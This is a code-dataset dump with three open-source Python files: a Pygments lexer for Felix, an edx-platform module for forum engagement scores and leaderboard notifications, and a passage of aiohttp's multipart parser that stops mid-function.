repo_name stringlengths 6 100 | path stringlengths 4 294 | copies stringlengths 1 5 | size stringlengths 4 6 | content stringlengths 606 896k | license stringclasses 15
values |
|---|---|---|---|---|---|
wangjun/wakatime | wakatime/packages/pygments_py3/pygments/lexers/felix.py | 72 | 9410 | # -*- coding: utf-8 -*-
"""
pygments.lexers.felix
~~~~~~~~~~~~~~~~~~~~~
Lexer for the Felix language.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer, include, bygroups, default, words, \
combined
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation
__all__ = ['FelixLexer']
class FelixLexer(RegexLexer):
    """
    For `Felix <http://www.felix-lang.org>`_ source code.

    .. versionadded:: 1.2
    """

    name = 'Felix'
    aliases = ['felix', 'flx']
    filenames = ['*.flx', '*.flxh']
    mimetypes = ['text/x-felix']

    # Directive names recognized after a leading '#' (see the 'macro' state).
    preproc = (
        'elif', 'else', 'endif', 'if', 'ifdef', 'ifndef',
    )

    # General language keywords.
    keywords = (
        '_', '_deref', 'all', 'as',
        'assert', 'attempt', 'call', 'callback', 'case', 'caseno', 'cclass',
        'code', 'compound', 'ctypes', 'do', 'done', 'downto', 'elif', 'else',
        'endattempt', 'endcase', 'endif', 'endmatch', 'enum', 'except',
        'exceptions', 'expect', 'finally', 'for', 'forall', 'forget', 'fork',
        'functor', 'goto', 'ident', 'if', 'incomplete', 'inherit', 'instance',
        'interface', 'jump', 'lambda', 'loop', 'match', 'module', 'namespace',
        'new', 'noexpand', 'nonterm', 'obj', 'of', 'open', 'parse', 'raise',
        'regexp', 'reglex', 'regmatch', 'rename', 'return', 'the', 'then',
        'to', 'type', 'typecase', 'typedef', 'typematch', 'typeof', 'upto',
        'when', 'whilst', 'with', 'yield',
    )

    # Keywords highlighted as decorators (compiler directives/annotations).
    keyword_directives = (
        '_gc_pointer', '_gc_type', 'body', 'comment', 'const', 'export',
        'header', 'inline', 'lval', 'macro', 'noinline', 'noreturn',
        'package', 'private', 'pod', 'property', 'public', 'publish',
        'requires', 'todo', 'virtual', 'use',
    )

    keyword_declarations = (
        'def', 'let', 'ref', 'val', 'var',
    )

    # Built-in type names.
    keyword_types = (
        'unit', 'void', 'any', 'bool',
        'byte', 'offset',
        'address', 'caddress', 'cvaddress', 'vaddress',
        'tiny', 'short', 'int', 'long', 'vlong',
        'utiny', 'ushort', 'vshort', 'uint', 'ulong', 'uvlong',
        'int8', 'int16', 'int32', 'int64',
        'uint8', 'uint16', 'uint32', 'uint64',
        'float', 'double', 'ldouble',
        'complex', 'dcomplex', 'lcomplex',
        'imaginary', 'dimaginary', 'limaginary',
        'char', 'wchar', 'uchar',
        'charp', 'charcp', 'ucharp', 'ucharcp',
        'string', 'wstring', 'ustring',
        'cont',
        'array', 'varray', 'list',
        'lvalue', 'opt', 'slice',
    )

    keyword_constants = (
        'false', 'true',
    )

    # Word-like operators.
    operator_words = (
        'and', 'not', 'in', 'is', 'isin', 'or', 'xor',
    )

    name_builtins = (
        '_svc', 'while',
    )

    name_pseudo = (
        'root', 'self', 'this',
    )

    # Optional type-selecting suffix on integer literals (e.g. 10u32, 5LL).
    decimal_suffixes = '([tTsSiIlLvV]|ll|LL|([iIuU])(8|16|32|64))?'

    tokens = {
        'root': [
            include('whitespace'),

            # Keywords
            (words(('axiom', 'ctor', 'fun', 'gen', 'proc', 'reduce',
                    'union'), suffix=r'\b'),
             Keyword, 'funcname'),
            (words(('class', 'cclass', 'cstruct', 'obj', 'struct'), suffix=r'\b'),
             Keyword, 'classname'),
            (r'(instance|module|typeclass)\b', Keyword, 'modulename'),

            (words(keywords, suffix=r'\b'), Keyword),
            (words(keyword_directives, suffix=r'\b'), Name.Decorator),
            (words(keyword_declarations, suffix=r'\b'), Keyword.Declaration),
            (words(keyword_types, suffix=r'\b'), Keyword.Type),
            (words(keyword_constants, suffix=r'\b'), Keyword.Constant),

            # Operators
            include('operators'),

            # Float Literal
            # -- Hex Float
            (r'0[xX]([0-9a-fA-F_]*\.[0-9a-fA-F_]+|[0-9a-fA-F_]+)'
             r'[pP][+\-]?[0-9_]+[lLfFdD]?', Number.Float),
            # -- DecimalFloat
            (r'[0-9_]+(\.[0-9_]+[eE][+\-]?[0-9_]+|'
             r'\.[0-9_]*|[eE][+\-]?[0-9_]+)[lLfFdD]?', Number.Float),
            (r'\.(0|[1-9][0-9_]*)([eE][+\-]?[0-9_]+)?[lLfFdD]?',
             Number.Float),

            # IntegerLiteral
            # -- Binary
            (r'0[Bb][01_]+%s' % decimal_suffixes, Number.Bin),
            # -- Octal
            (r'0[0-7_]+%s' % decimal_suffixes, Number.Oct),
            # -- Hexadecimal
            (r'0[xX][0-9a-fA-F_]+%s' % decimal_suffixes, Number.Hex),
            # -- Decimal
            (r'(0|[1-9][0-9_]*)%s' % decimal_suffixes, Number.Integer),

            # Strings
            # raw/c-raw prefixed strings get no escape processing; all other
            # prefixes combine the 'stringescape' state with the quote state.
            ('([rR][cC]?|[cC][rR])"""', String, 'tdqs'),
            ("([rR][cC]?|[cC][rR])'''", String, 'tsqs'),
            ('([rR][cC]?|[cC][rR])"', String, 'dqs'),
            ("([rR][cC]?|[cC][rR])'", String, 'sqs'),
            ('[cCfFqQwWuU]?"""', String, combined('stringescape', 'tdqs')),
            ("[cCfFqQwWuU]?'''", String, combined('stringescape', 'tsqs')),
            ('[cCfFqQwWuU]?"', String, combined('stringescape', 'dqs')),
            ("[cCfFqQwWuU]?'", String, combined('stringescape', 'sqs')),

            # Punctuation
            (r'[\[\]{}:(),;?]', Punctuation),

            # Labels
            (r'[a-zA-Z_]\w*:>', Name.Label),

            # Identifiers
            (r'(%s)\b' % '|'.join(name_builtins), Name.Builtin),
            (r'(%s)\b' % '|'.join(name_pseudo), Name.Builtin.Pseudo),
            (r'[a-zA-Z_]\w*', Name),
        ],
        'whitespace': [
            (r'\n', Text),
            (r'\s+', Text),

            include('comment'),

            # Preprocessor
            (r'#\s*if\s+0', Comment.Preproc, 'if0'),
            (r'#', Comment.Preproc, 'macro'),
        ],
        'operators': [
            (r'(%s)\b' % '|'.join(operator_words), Operator.Word),
            (r'!=|==|<<|>>|\|\||&&|[-~+/*%=<>&^|.$]', Operator),
        ],
        'comment': [
            (r'//(.*?)\n', Comment.Single),
            (r'/[*]', Comment.Multiline, 'comment2'),
        ],
        # Nestable /* ... */ comments: '#push' handles the nesting.
        'comment2': [
            (r'[^/*]', Comment.Multiline),
            (r'/[*]', Comment.Multiline, '#push'),
            (r'[*]/', Comment.Multiline, '#pop'),
            (r'[/*]', Comment.Multiline),
        ],
        # Skip over '#if 0' blocks, tracking nested #if/#endif.
        'if0': [
            (r'^\s*#if.*?(?<!\\)\n', Comment, '#push'),
            (r'^\s*#endif.*?(?<!\\)\n', Comment, '#pop'),
            (r'.*?\n', Comment),
        ],
        # Body of a '#' preprocessor line; import/include paths are strings.
        'macro': [
            include('comment'),
            (r'(import|include)(\s+)(<[^>]*?>)',
             bygroups(Comment.Preproc, Text, String), '#pop'),
            (r'(import|include)(\s+)("[^"]*?")',
             bygroups(Comment.Preproc, Text, String), '#pop'),
            (r"(import|include)(\s+)('[^']*?')",
             bygroups(Comment.Preproc, Text, String), '#pop'),
            (r'[^/\n]+', Comment.Preproc),
            # (r'/[*](.|\n)*?[*]/', Comment),
            # (r'//.*?\n', Comment, '#pop'),
            (r'/', Comment.Preproc),
            # a backslash-continued line keeps us in the macro state
            (r'(?<=\\)\n', Comment.Preproc),
            (r'\n', Comment.Preproc, '#pop'),
        ],
        'funcname': [
            include('whitespace'),
            (r'[a-zA-Z_]\w*', Name.Function, '#pop'),
            # anonymous functions
            (r'(?=\()', Text, '#pop'),
        ],
        'classname': [
            include('whitespace'),
            (r'[a-zA-Z_]\w*', Name.Class, '#pop'),
            # anonymous classes
            (r'(?=\{)', Text, '#pop'),
        ],
        # Module names may carry a bracketed type-variable list first.
        'modulename': [
            include('whitespace'),
            (r'\[', Punctuation, ('modulename2', 'tvarlist')),
            default('modulename2'),
        ],
        'modulename2': [
            include('whitespace'),
            (r'([a-zA-Z_]\w*)', Name.Namespace, '#pop:2'),
        ],
        # Contents of a [...] type-variable list; brackets may nest.
        'tvarlist': [
            include('whitespace'),
            include('operators'),
            (r'\[', Punctuation, '#push'),
            (r'\]', Punctuation, '#pop'),
            (r',', Punctuation),
            (r'(with|where)\b', Keyword),
            (r'[a-zA-Z_]\w*', Name),
        ],
        'stringescape': [
            (r'\\([\\abfnrtv"\']|\n|N\{.*?\}|u[a-fA-F0-9]{4}|'
             r'U[a-fA-F0-9]{8}|x[a-fA-F0-9]{2}|[0-7]{1,3})', String.Escape)
        ],
        # Shared body rules for all quote styles (printf-style interpolation).
        'strings': [
            (r'%(\([a-zA-Z0-9]+\))?[-#0 +]*([0-9]+|[*])?(\.([0-9]+|[*]))?'
             '[hlL]?[diouxXeEfFgGcrs%]', String.Interpol),
            (r'[^\\\'"%\n]+', String),
            # quotes, percents and backslashes must be parsed one at a time
            (r'[\'"\\]', String),
            # unhandled string formatting sign
            (r'%', String)
            # newlines are an error (use "nl" state)
        ],
        'nl': [
            (r'\n', String)
        ],
        'dqs': [
            (r'"', String, '#pop'),
            # included here again for raw strings
            (r'\\\\|\\"|\\\n', String.Escape),
            include('strings')
        ],
        'sqs': [
            (r"'", String, '#pop'),
            # included here again for raw strings
            (r"\\\\|\\'|\\\n", String.Escape),
            include('strings')
        ],
        'tdqs': [
            (r'"""', String, '#pop'),
            include('strings'),
            include('nl')
        ],
        'tsqs': [
            (r"'''", String, '#pop'),
            include('strings'),
            include('nl')
        ],
    }
| bsd-3-clause |
edx-solutions/discussion-edx-platform-extensions | social_engagement/engagement.py | 1 | 14753 | """
Business logic tier regarding social engagement scores
"""
import logging
import sys
from collections import defaultdict
from datetime import datetime
import pytz
from django.conf import settings
from django.db.models.signals import post_save, pre_save
from django.dispatch import receiver
from django.http import HttpRequest
import openedx.core.djangoapps.django_comment_common.comment_client as cc
from edx_notifications.data import NotificationMessage
from edx_notifications.lib.publisher import (get_notification_type,
publish_notification_to_user)
from edx_solutions_api_integration.utils import get_aggregate_exclusion_user_ids
from lms.djangoapps.discussion.rest_api.exceptions import (CommentNotFoundError,
ThreadNotFoundError)
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.django_comment_common.comment_client.user import get_course_social_stats
from openedx.core.djangoapps.django_comment_common.comment_client.utils import CommentClientRequestError
from requests.exceptions import ConnectionError
from xmodule.modulestore.django import modulestore
from .models import StudentSocialEngagementScore
log = logging.getLogger(__name__)
def update_course_engagement(course_id, compute_if_closed_course=False, course_descriptor=None):
    """
    Compute and save engagement scores and stats for whole course.

    Iterates over per-user social stats from the forum service, converts each
    into a weighted score, and persists a ``StudentSocialEngagementScore``
    row per user.

    :param course_id: ``CourseKey`` or its string representation
    :param bool compute_if_closed_course: when True, recompute even if the
        course end date has passed
    :param course_descriptor: optional pre-fetched course descriptor
        (optimization to skip the modulestore lookup)
    :returns: number of user scores updated, or ``None`` when skipped
        (feature disabled, course not found, or course closed)
    """
    if not settings.FEATURES.get('ENABLE_SOCIAL_ENGAGEMENT', False):
        return

    course_key = course_id if isinstance(course_id, CourseKey) else CourseKey.from_string(course_id)

    # cs_comment_service works with slash-separated course_id strings
    slash_course_id = str(course_key)

    if not course_descriptor:
        # if course descriptor was not passed in (as an optimization)
        course_descriptor = modulestore().get_course(course_key)
        if not course_descriptor:
            # couldn't find course?!?
            return

    if not compute_if_closed_course and course_descriptor.end:
        # if course is closed then don't bother. Note we can override this if we want to force update
        now_utc = datetime.now(pytz.UTC)
        if now_utc > course_descriptor.end:
            log.info('update_user_engagement_score() is skipping because the course is closed...')
            return

    score_update_count = 0
    try:
        for user_id, social_stats in _get_course_social_stats(slash_course_id):
            log.info('Updating social engagement score for user_id {} in course_key {}'.format(user_id, course_key))
            current_score = _compute_social_engagement_score(social_stats)
            StudentSocialEngagementScore.save_user_engagement_score(
                course_key, user_id, current_score, social_stats
            )
            score_update_count += 1
    except (CommentClientRequestError, ConnectionError) as error:
        # forum service hiccups are logged but never fatal here
        log.exception(error)

    return score_update_count
def _get_course_social_stats(course_id):
    """
    Yield ``(user_id, stats)`` pairs for the whole course from the Forum API.
    """
    yield from get_course_social_stats(course_id).items()
def get_social_metric_points():
    """
    Get custom or default social metric points.

    Returns the ``SOCIAL_METRIC_POINTS`` mapping from Django settings when
    defined, otherwise the built-in default weights per social activity.
    """
    default_points = {
        'num_threads': 10,
        'num_comments': 15,
        'num_replies': 15,
        'num_upvotes': 25,
        'num_thread_followers': 5,
        'num_comments_generated': 15,
    }
    return getattr(settings, 'SOCIAL_METRIC_POINTS', default_points)
def _compute_social_engagement_score(social_metrics):
    """
    Compute the weighted engagement score for one user's social stats.

    Each known metric contributes its count times its configured weight;
    metrics missing from ``social_metrics`` count as zero.
    """
    weights = get_social_metric_points()
    return sum(
        social_metrics.get(metric, 0) * weight
        for metric, weight in weights.items()
    )
#
# Support for Notifications, these two receivers should actually be migrated into a new Leaderboard django app.
# For now, put the business logic here, but it is pretty decoupled through event signaling
# so we should be able to move these files easily when we are able to do so
#
@receiver(pre_save, sender=StudentSocialEngagementScore)
def handle_progress_pre_save_signal(sender, instance, **kwargs):
    """
    Handle the pre-save ORM event on StudentSocialEngagementScore.

    Stashes the user's current leaderboard position on the instance
    (``presave_leaderboard_rank``) so the post-save handler can tell whether
    this save moved the user into the leaderboard.
    """
    if settings.FEATURES['ENABLE_NOTIFICATIONS']:
        # If notifications feature is enabled, then we need to get the user's
        # rank before the save is made, so that we can compare it to
        # after the save and see if the position changes
        instance.presave_leaderboard_rank = StudentSocialEngagementScore.get_user_leaderboard_position(
            instance.course_id,
            user_id=instance.user.id,
            exclude_users=get_aggregate_exclusion_user_ids(instance.course_id)
        )['position']
@receiver(post_save, sender=StudentSocialEngagementScore)
def handle_progress_post_save_signal(sender, instance, **kwargs):
    """
    Handle the post-save ORM event on StudentSocialEngagementScore.

    When notifications are enabled, compares the user's leaderboard position
    after the save against the position stashed by the pre-save handler, and
    publishes a 'rank-changed' notification when the user has just entered
    the leaderboard.
    """
    if settings.FEATURES['ENABLE_NOTIFICATIONS']:
        # Get the user's rank after the save, so we can compare it against
        # the pre-save rank captured in handle_progress_pre_save_signal
        leaderboard_rank = StudentSocialEngagementScore.get_user_leaderboard_position(
            instance.course_id,
            user_id=instance.user.id,
            exclude_users=get_aggregate_exclusion_user_ids(instance.course_id)
        )['position']

        if leaderboard_rank == 0:
            # quick escape when user is not in the leaderboard
            # which means rank = 0. Trouble is 0 < 3, so unfortunately
            # the semantics around 0 don't match the logic below
            return

        # logic for Notification trigger is when a user enters into the Leaderboard
        leaderboard_size = getattr(settings, 'LEADERBOARD_SIZE', 3)
        presave_leaderboard_rank = instance.presave_leaderboard_rank if instance.presave_leaderboard_rank else sys.maxsize
        if leaderboard_rank <= leaderboard_size and presave_leaderboard_rank > leaderboard_size:
            try:
                notification_msg = NotificationMessage(
                    msg_type=get_notification_type('open-edx.lms.leaderboard.engagement.rank-changed'),
                    namespace=str(instance.course_id),
                    payload={
                        '_schema_version': '1',
                        'rank': leaderboard_rank,
                        'leaderboard_name': 'Engagement',
                    }
                )

                #
                # add in all the context parameters we'll need to
                # generate a URL back to the website that will
                # present the new course announcement
                #
                # IMPORTANT: This can be changed to msg.add_click_link() if we
                # have a particular URL that we wish to use. In the initial use case,
                # we need to make the link point to a different front end website
                # so we need to resolve these links at dispatch time
                #
                notification_msg.add_click_link_params({
                    'course_id': str(instance.course_id),
                })

                publish_notification_to_user(int(instance.user.id), notification_msg)
            except Exception as ex:
                # Notifications are never critical, so we don't want to disrupt any
                # other logic processing. So log and continue.
                log.exception(ex)
def get_involved_users_in_thread(request, thread):
    """
    Compute all the users involved in the children of a specific thread.

    Returns a dict mapping user_id -> per-user counters (``num_upvotes``,
    ``num_threads``, ``num_comments_generated``, ``num_thread_followers``,
    ``num_flagged``), including the thread author's own counters.
    """
    params = {"thread_id": thread.id, "page_size": 100}
    is_question = getattr(thread, "thread_type", None) == "question"
    author_id = getattr(thread, 'user_id', None)
    results = _detail_results_factory()

    if is_question:
        # question threads paginate endorsed and non-endorsed comments
        # separately, so both sets must be walked
        # get users of the non-endorsed comments in thread
        params.update({"endorsed": False})
        _get_details_for_deletion(_get_request(request, params), results=results, is_thread=True)
        # get users of the endorsed comments in thread
        if getattr(thread, 'has_endorsed', False):
            params.update({"endorsed": True})
            _get_details_for_deletion(_get_request(request, params), results=results, is_thread=True)
    else:
        _get_details_for_deletion(_get_request(request, params), results=results, is_thread=True)

    users = results['users']
    if author_id:
        # credit the thread author for the thread itself and its activity
        users[author_id]['num_upvotes'] += thread.votes.get('count', 0)
        users[author_id]['num_threads'] += 1
        users[author_id]['num_comments_generated'] += results['all_comments']
        users[author_id]['num_thread_followers'] += thread.get_num_followers()
        if thread.abuse_flaggers:
            users[author_id]['num_flagged'] += 1

    return users
def get_involved_users_in_comment(request, comment):
    """
    Method used to extract the involved users in the comment.

    This method also returns the creator of the post.
    Returns a dict mapping user_id -> per-user counters (``num_upvotes``,
    ``num_replies``, ``num_comments``, ``num_flagged``,
    ``num_comments_generated``).
    """
    params = {"page_size": 100}
    comment_author_id = getattr(comment, 'user_id', None)
    thread_author_id = None
    if hasattr(comment, 'thread_id'):
        thread_author_id = _get_author_of_thread(comment.thread_id)

    results = _get_details_for_deletion(_get_request(request, params), comment.id, nested=True)
    users = results['users']

    if comment_author_id:
        users[comment_author_id]['num_upvotes'] += comment.votes.get('count', 0)
        if getattr(comment, 'parent_id', None):
            # It's a reply.
            users[comment_author_id]['num_replies'] += 1
        else:
            # It's a comment.
            users[comment_author_id]['num_comments'] += 1
        if comment.abuse_flaggers:
            users[comment_author_id]['num_flagged'] += 1

    if thread_author_id:
        # thread author is credited with the comment plus all its replies
        users[thread_author_id]['num_comments_generated'] += results['replies'] + 1

    return users
def _detail_results_factory():
"""
Helper method to maintain organized result structure while getting involved users.
"""
return {
'replies': 0,
'all_comments': 0,
'users': defaultdict(lambda: defaultdict(int)),
}
def _get_users_in_thread(request):
    """
    Collect the set of author usernames appearing anywhere in a thread.

    Pages through the comment listing (thread id is expected in the request's
    query params) and recurses into comments that have children. Returns
    whatever was gathered so far if the thread cannot be found.
    """
    from lms.djangoapps.discussion.rest_api.views import CommentViewSet
    users = set()
    response_page = 1
    has_results = True
    while has_results:
        try:
            params = {"page": response_page}
            response = CommentViewSet().list(
                _get_request(request, params)
            )

            for comment in response.data["results"]:
                users.add(comment["author"])
                if comment["child_count"] > 0:
                    users.update(_get_users_in_comment(request, comment["id"]))
            has_results = response.data["pagination"]["next"]
            response_page += 1
        except (ThreadNotFoundError, InvalidKeyError):
            # thread is gone or id is malformed; return what we have
            return users
    return users
def _get_users_in_comment(request, comment_id):
    """
    Collect the set of author usernames in a comment's reply subtree.

    Pages through the comment's children and recurses into replies that have
    children of their own. Returns whatever was gathered so far if the
    comment cannot be found.
    """
    from lms.djangoapps.discussion.rest_api.views import CommentViewSet
    users = set()
    response_page = 1
    has_results = True
    while has_results:
        try:
            response = CommentViewSet().retrieve(_get_request(request, {"page": response_page}), comment_id)
            for comment in response.data["results"]:
                users.add(comment["author"])
                if comment["child_count"] > 0:
                    users.update(_get_users_in_comment(request, comment["id"]))
            has_results = response.data["pagination"]["next"]
            response_page += 1
        except (ThreadNotFoundError, InvalidKeyError):
            # comment is gone or id is malformed; return what we have
            return users
    return users
def _get_request(incoming_request, params):
    """
    Build a fresh GET ``HttpRequest`` cloned from ``incoming_request``.

    Copies the user, META and query string of the incoming request and merges
    ``params`` into the query parameters, so view methods can be re-invoked
    with page/filter overrides without mutating the original request.
    """
    request = HttpRequest()
    request.method = 'GET'
    request.user = incoming_request.user
    request.META = incoming_request.META.copy()
    request.GET = incoming_request.GET.copy()
    request.GET.update(params)
    return request
def _get_author_of_comment(parent_id):
    """
    Return the ``user_id`` of the comment's author, or ``None`` (implicitly)
    when the comment is missing or has no author attribute.
    """
    comment = cc.Comment.find(parent_id)
    if comment and hasattr(comment, 'user_id'):
        return comment.user_id
def _get_author_of_thread(thread_id):
    """
    Return the ``user_id`` of the thread's author, or ``None`` (implicitly)
    when the thread is missing or has no author attribute.
    """
    thread = cc.Thread.find(thread_id)
    if thread and hasattr(thread, 'user_id'):
        return thread.user_id
def _get_details_for_deletion(request, comment_id=None, results=None, nested=False, is_thread=False):
    """
    Get details of comment or thread and related users that are required for deletion purposes.

    Walks every page of the thread's comments (``is_thread=True``) or of a
    single comment's children, accumulating per-user counters into
    ``results`` (a ``_detail_results_factory()`` structure, created here when
    not supplied). ``nested`` controls whether encountered comments count as
    replies instead of top-level comments.
    """
    if not results:
        results = _detail_results_factory()
    for page, response in enumerate(_get_paginated_results(request, comment_id, is_thread)):
        if page == 0:
            # total counts are taken from the first page's pagination header
            results['all_comments'] += response.data['pagination']['count']
            if results['replies'] == 0:
                results['replies'] = response.data['pagination']['count']
        for comment in response.data['results']:
            _extract_stats_from_comment(request, comment, results, nested)
    return results
def _get_paginated_results(request, comment_id, is_thread):
    """
    Yield paginated comment responses for a thread or a single comment.

    :param request: request whose query params carry the listing filters
    :param comment_id: comment to retrieve children for (ignored when
        ``is_thread`` is True)
    :param bool is_thread: list a whole thread instead of one comment
    :yields: DRF responses, one per page, until pagination reports no next
        page or the thread/comment disappears
    """
    from lms.djangoapps.discussion.rest_api.views import CommentViewSet
    response_page = 1
    has_next = True
    while has_next:
        try:
            if is_thread:
                response = CommentViewSet().list(_get_request(request, {"page": response_page}))
            else:
                response = CommentViewSet().retrieve(_get_request(request, {"page": response_page}), comment_id)
        except (ThreadNotFoundError, CommentNotFoundError, InvalidKeyError):
            # BUGFIX: `raise StopIteration` inside a generator is turned into
            # RuntimeError by PEP 479 on Python 3.7+; a plain return is the
            # correct way to end the generator early.
            return
        has_next = response.data["pagination"]["next"]
        response_page += 1
        yield response
def _extract_stats_from_comment(request, comment, results, nested):
    """
    Extract results from comment and its nested comments.

    Increments the author's comment-or-reply counter (depending on
    ``nested``), adds upvotes and abuse flags, and recurses into children
    via ``_get_details_for_deletion``.
    """
    user_id = comment.serializer.instance['user_id']

    if not nested:
        results['users'][user_id]['num_comments'] += 1
    else:
        results['users'][user_id]['num_replies'] += 1

    results['users'][user_id]['num_upvotes'] += comment['vote_count']
    if comment.serializer.instance['abuse_flaggers']:
        results['users'][user_id]['num_flagged'] += 1

    if comment['child_count'] > 0:
        # children of any comment are counted as replies
        _get_details_for_deletion(request, comment['id'], results, nested=True)
| agpl-3.0 |
vaskalas/aiohttp | aiohttp/multipart.py | 3 | 32102 | import asyncio
import binascii
import base64
import json
import io
import mimetypes
import os
import re
import uuid
import warnings
import zlib
from urllib.parse import quote, unquote, urlencode, parse_qsl
from collections import deque, Mapping, Sequence
from pathlib import Path
from multidict import CIMultiDict
from .helpers import parse_mimetype
from .protocol import HttpParser
from .hdrs import (
CONTENT_DISPOSITION,
CONTENT_ENCODING,
CONTENT_LENGTH,
CONTENT_TRANSFER_ENCODING,
CONTENT_TYPE
)
__all__ = ('MultipartReader', 'MultipartWriter',
'BodyPartReader', 'BodyPartWriter',
'BadContentDispositionHeader', 'BadContentDispositionParam',
'parse_content_disposition', 'content_disposition_filename')
# HTTP character classes (RFC 2616 section 2.2): TOKEN ends up as the set of
# ASCII characters allowed in an HTTP token, i.e. all of CHAR minus the
# control characters and separators (the ^ chains subtract the subsets).
CHAR = set(chr(i) for i in range(0, 128))
CTL = set(chr(i) for i in range(0, 32)) | {chr(127), }
SEPARATORS = {'(', ')', '<', '>', '@', ',', ';', ':', '\\', '"', '/', '[', ']',
              '?', '=', '{', '}', ' ', chr(9)}
TOKEN = CHAR ^ CTL ^ SEPARATORS
class BadContentDispositionHeader(RuntimeWarning):
    # Warned when an entire Content-Disposition header is malformed and
    # parsing returns (None, {}).
    pass
class BadContentDispositionParam(RuntimeWarning):
    # Warned when a single Content-Disposition parameter is malformed and
    # that parameter is skipped.
    pass
def parse_content_disposition(header):
    """
    Parse a ``Content-Disposition`` header value.

    Returns a ``(disposition_type, params)`` tuple, where ``params`` is a
    dict of parameter name -> value. On a malformed header, warns with
    :class:`BadContentDispositionHeader` and returns ``(None, {})``; a
    malformed single parameter warns with
    :class:`BadContentDispositionParam` and is skipped.
    """

    def is_token(string):
        # non-empty and composed only of RFC 2616 token characters
        return string and TOKEN >= set(string)

    def is_quoted(string):
        return string[0] == string[-1] == '"'

    def is_rfc5987(string):
        # extended value of the form: charset'language'percent-encoded
        return is_token(string) and string.count("'") == 2

    def is_extended_param(string):
        return string.endswith('*')

    def is_continuous_param(string):
        # RFC 2231 continuation: name*0, name*1*, ... (digits after '*')
        pos = string.find('*') + 1
        if not pos:
            return False
        substring = string[pos:-1] if string.endswith('*') else string[pos:]
        return substring.isdigit()

    def unescape(text, *, chars=''.join(map(re.escape, CHAR))):
        return re.sub('\\\\([{}])'.format(chars), '\\1', text)

    if not header:
        return None, {}

    disptype, *parts = header.split(';')
    if not is_token(disptype):
        warnings.warn(BadContentDispositionHeader(header))
        return None, {}

    params = {}
    for item in parts:
        if '=' not in item:
            warnings.warn(BadContentDispositionHeader(header))
            return None, {}

        key, value = item.split('=', 1)
        key = key.lower().strip()
        value = value.lstrip()

        if key in params:
            # duplicate parameter invalidates the whole header
            warnings.warn(BadContentDispositionHeader(header))
            return None, {}

        if not is_token(key):
            warnings.warn(BadContentDispositionParam(item))
            continue

        elif is_continuous_param(key):
            if is_quoted(value):
                value = unescape(value[1:-1])
            elif not is_token(value):
                warnings.warn(BadContentDispositionParam(item))
                continue

        elif is_extended_param(key):
            if is_rfc5987(value):
                encoding, _, value = value.split("'", 2)
                encoding = encoding or 'utf-8'
            else:
                warnings.warn(BadContentDispositionParam(item))
                continue

            try:
                value = unquote(value, encoding, 'strict')
            except UnicodeDecodeError:  # pragma: nocover
                warnings.warn(BadContentDispositionParam(item))
                continue

        else:
            if is_quoted(value):
                value = unescape(value[1:-1].lstrip('\\/'))
            elif not is_token(value):
                warnings.warn(BadContentDispositionHeader(header))
                return None, {}

        params[key] = value

    return disptype.lower(), params
def content_disposition_filename(params):
    """
    Extract the file name from parsed ``Content-Disposition`` parameters.

    Prefers the RFC 5987 ``filename*`` parameter, then plain ``filename``,
    and finally reassembles RFC 2231 continuation parameters
    (``filename*0``, ``filename*1*``, ...). Returns ``None`` when no usable
    file name is present.
    """
    if not params:
        return None
    for simple_key in ('filename*', 'filename'):
        if simple_key in params:
            return params[simple_key]

    # Reassemble RFC 2231 continuations in numeric order, stopping at the
    # first gap in the numbering.
    continuations = sorted(
        (key, value)
        for key, value in params.items()
        if key.startswith('filename*')
    )
    pieces = []
    for index, (key, value) in enumerate(continuations):
        _, tail = key.split('*', 1)
        tail = tail[:-1] if tail.endswith('*') else tail
        if tail != str(index):
            break
        pieces.append(value)

    if not pieces:
        return None
    joined = ''.join(pieces)
    if "'" not in joined:
        return joined
    # charset'language'percent-encoded form: decode with the stated charset
    encoding, _, joined = joined.split("'", 2)
    return unquote(joined, encoding or 'utf-8', 'strict')
class MultipartResponseWrapper(object):
    """Wrapper around the :class:`MultipartBodyReader` to take care about
    underlying connection and close it when it needs in."""

    def __init__(self, resp, stream):
        # resp: the HTTP response owning the connection
        # stream: the multipart reader consuming resp's content
        self.resp = resp
        self.stream = stream

    @asyncio.coroutine
    def __aiter__(self):
        return self

    @asyncio.coroutine
    def __anext__(self):
        part = yield from self.next()
        if part is None:
            raise StopAsyncIteration  # NOQA
        return part

    def at_eof(self):
        """Returns ``True`` when all response data had been read.

        :rtype: bool
        """
        return self.resp.content.at_eof()

    @asyncio.coroutine
    def next(self):
        """Emits next multipart reader object."""
        item = yield from self.stream.next()
        if self.stream.at_eof():
            # all parts consumed: release the underlying connection
            yield from self.release()
        return item

    @asyncio.coroutine
    def release(self):
        """Releases the connection gracefully, reading all the content
        to the void."""
        yield from self.resp.release()
class BodyPartReader(object):
    """Multipart reader for single body part."""

    # default size for chunked reads
    chunk_size = 8192

    def __init__(self, boundary, headers, content):
        # boundary: bytes boundary marker (including leading '--')
        # headers: this part's headers (CIMultiDict-like)
        # content: the underlying stream to read the part's payload from
        self.headers = headers
        self._boundary = boundary
        self._content = content
        self._at_eof = False
        length = self.headers.get(CONTENT_LENGTH, None)
        # explicit Content-Length, when the part declares one
        self._length = int(length) if length is not None else None
        self._read_bytes = 0
        # lines pushed back by readline() (e.g. a peeked boundary line)
        self._unread = deque()
        # previous chunk kept for boundary detection across chunk edges
        self._prev_chunk = None
        # counts consecutive EOF observations of the underlying stream
        self._content_eof = 0

    @asyncio.coroutine
    def __aiter__(self):
        return self

    @asyncio.coroutine
    def __anext__(self):
        part = yield from self.next()
        if part is None:
            raise StopAsyncIteration  # NOQA
        return part

    @asyncio.coroutine
    def next(self):
        item = yield from self.read()
        if not item:
            return None
        return item

    @asyncio.coroutine
    def read(self, *, decode=False):
        """Reads body part data.

        :param bool decode: Decodes data following by encoding
                            method from `Content-Encoding` header. If it missed
                            data remains untouched
        :rtype: bytearray
        """
        if self._at_eof:
            return b''
        data = bytearray()
        if self._length is None:
            # length unknown: scan line by line until the boundary is seen
            while not self._at_eof:
                data.extend((yield from self.readline()))
        else:
            while not self._at_eof:
                data.extend((yield from self.read_chunk(self.chunk_size)))
        if decode:
            return self.decode(data)
        return data

    @asyncio.coroutine
    def read_chunk(self, size=chunk_size):
        """Reads body part content chunk of the specified size.

        :param int size: chunk size

        :rtype: bytearray
        """
        if self._at_eof:
            return b''
        if self._length:
            chunk = yield from self._read_chunk_from_length(size)
        else:
